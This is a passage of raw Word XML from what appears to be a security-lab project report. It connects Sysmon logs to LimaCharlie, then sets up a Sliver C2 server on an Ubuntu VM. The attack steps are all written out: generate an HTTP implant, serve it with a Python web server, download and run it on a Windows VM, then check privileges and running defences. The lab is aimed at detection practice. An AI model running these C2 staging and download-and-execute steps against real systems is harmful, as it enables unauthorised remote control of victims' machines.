          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5420995" cy="3484245"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5420995" cy="348424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Configure LimaCharlie to Ship Sysmon Event Logs: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Within the LimaCharlie dashboard,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Artifact Collection" in the left-side menu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> New </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Artifact Collection Rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is added and configured as follows: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Name: windows-sysmon-logs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Platforms: Windows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Path Pattern: wel://Microsoft-Windows-Sysmon/Operational:*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">-  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Retention Period: 10</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LimaCharlie will commence the shipping of Sysmon logs, enriching the platform with an extensive array of EDR-like telemetry. This integration is particularly valuable due to the insights Sysmon logs provide, complementing LimaCharlie's native telemetry. Additionally, the utilization of Sysmon logs aligns with the Sigma rules previously enabled, enhancing overall threat detection efficacy.</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lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Timeline” on the left-side menu of our sensor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a near real-time view of EDR telemetry + event logs streaming from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system.</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ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5644515" cy="2474595"/>
            <wp:effectExtent l="0" t="0" r="13335" b="1905"/>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5644515" cy="247459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cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setting Up Attack System on Ubuntu VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Generating C2 Payload</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This section details the essential steps for configuring the attack infrastructure on the Ubuntu virtual machine (VM), a pivotal phase in our project for executing adversarial actions.</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Accessing Ubuntu VM via SSH</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Initiate remote access to the Ubuntu VM from the host system using SSH:</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 xml:space="preserve">ssh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@[Linux_VM_IP]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Installing Sliver C2 Server Binary</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Download the Sliver Linux server binary and store it in the designated directory:</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sudo su</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wget https://github.com/BishopFox/sliver/releases/download/v1.5.34/sliver-server_linux -O /usr/local/bin/sliver-server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Configuring Binary Execution Permissions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Grant executable permissions to the Sliver server binary:</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chmod +x /usr/local/bin/sliver-server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Enhancing Capabilities with mingw-w64 Installation</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Install the mingw-w64 package to augment system capabilities:</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apt install -y mingw-w64</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bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provisioning Working Directory</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Create a dedicated working directory within the Ubuntu VM:</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mkdir -p /opt/sliver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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>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Launching Sliver C2 Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </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Sliver C2 server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">is initiated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on the attacker's Ubuntu virtual machine. This server serves as the central hub for orchestrating and managing C2 operations.</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sudo su</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cd /opt/sliver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sliver-server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4615815" cy="2245360"/>
            <wp:effectExtent l="0" t="0" r="13335" b="254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23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4615815" cy="2245360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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 xml:space="preserve">Generating </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: </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lang w:val="en-IN"/>
        </w:rPr>
        <w:t>By ut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iliz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Sliver C2 framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be generated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">perform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>our specific objectives. This payload serves as the conduit through which commands are transmitted from the attacker to the victim machine.</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generate --http [Linux_VM_IP] --save /opt/sliver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664835" cy="1195070"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5080"/>
            <wp:docPr id="2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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5664835" cy="1195070"/>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rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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Confirm the new implant configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mplants</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610225" cy="602615"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6985"/>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25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5610225" cy="60261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Exit Sliver for now:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xit</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5.6 Transferring C2 Payload and Starting C2 Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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pivotal stage entails the seamless transfer of the command and control (C2) payload from the attacker's system to the victim's environment, followed by the initiation of a C2 session to facilitate simulated adversarial activities.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Transferring Payload:</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Employing Secure Transfer Mechanism: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>To ensure a secure transfer mechanism is utilized, such as a temporary web server is hosted on the attacker's machine, to propagate the generated payload to the victim machine. This process maintains stringent security protocols while facilitating the seamless transmission of the payload.</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Navigate to the directory containing the C2 payload</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cd /opt/sliver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Initiate a Python HTTP server</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python3 -m http.server 80</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Downloading Payload on Victim Machine:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> From an Administrative Powershell prompt of Windows11 VM, the C2 payload is downloaded from the attacker's machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>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Invoke-WebRequest -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe</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Starting C2 Session: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Relaunching Sliver:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reinitialize the Sliver C2 server on the attacker's system to prepare for C2 session initiation.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Re-launch Sliver server</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sliver-server</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Start the Sliver HTTP listener</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http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Executing C2 Payload on Victim Machine:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the same shell on Windows VM, execute the downloaded C2 payload from its designated location </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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C:\Users\User\Downloads\&lt;your_C2-implant&gt;.exe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Interacting with C2 Session:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upon successful execution, verify the C2 session's check-in on the Sliver server. Within the Sliver shell, we can interact directly with the C2 session on the Windows VM.</w:t>
      </w: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723890" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>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26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5723890" cy="942975"/>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lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>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Check for available sessions</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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>essions</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695950" cy="768350"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>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27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5695950" cy="768350"/>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lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>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Interact with the specified session</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use [session_id]</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698490" cy="1204595"/>
            <wp:effectExtent l="0" t="0" r="16510" b="14605"/>
            <wp:docPr id="3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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5698490" cy="120459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Execute various commands to gain insights into the victim host</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Getprivs</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720080" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="13970" b="6350"/>
            <wp:docPr id="3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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5720080" cy="2717800"/>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Notice that we(attacker) have a few privileges that make further attack activity much easier, such as “SeDebugPrivilege”.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Identify running processes on the remote system.</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ps -T</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660390" cy="8794115"/>
            <wp:effectExtent l="0" t="0" r="16510" b="6985"/>
            <wp:docPr id="3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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5660390" cy="879411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Notice that Sliver cleverly highlights its own process in green and any detected countermeasures (defensive tools) in red.</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4457700" cy="883920"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="3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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4457700" cy="883920"/>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is how attackers become aware of what security products a victim system may be using.</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These meticulously executed steps facilitate the smooth transfer of the C2 payload and the establishment of a C2 session, enabling simulated adversarial activities while maintaining a professional and controlled approach.</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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
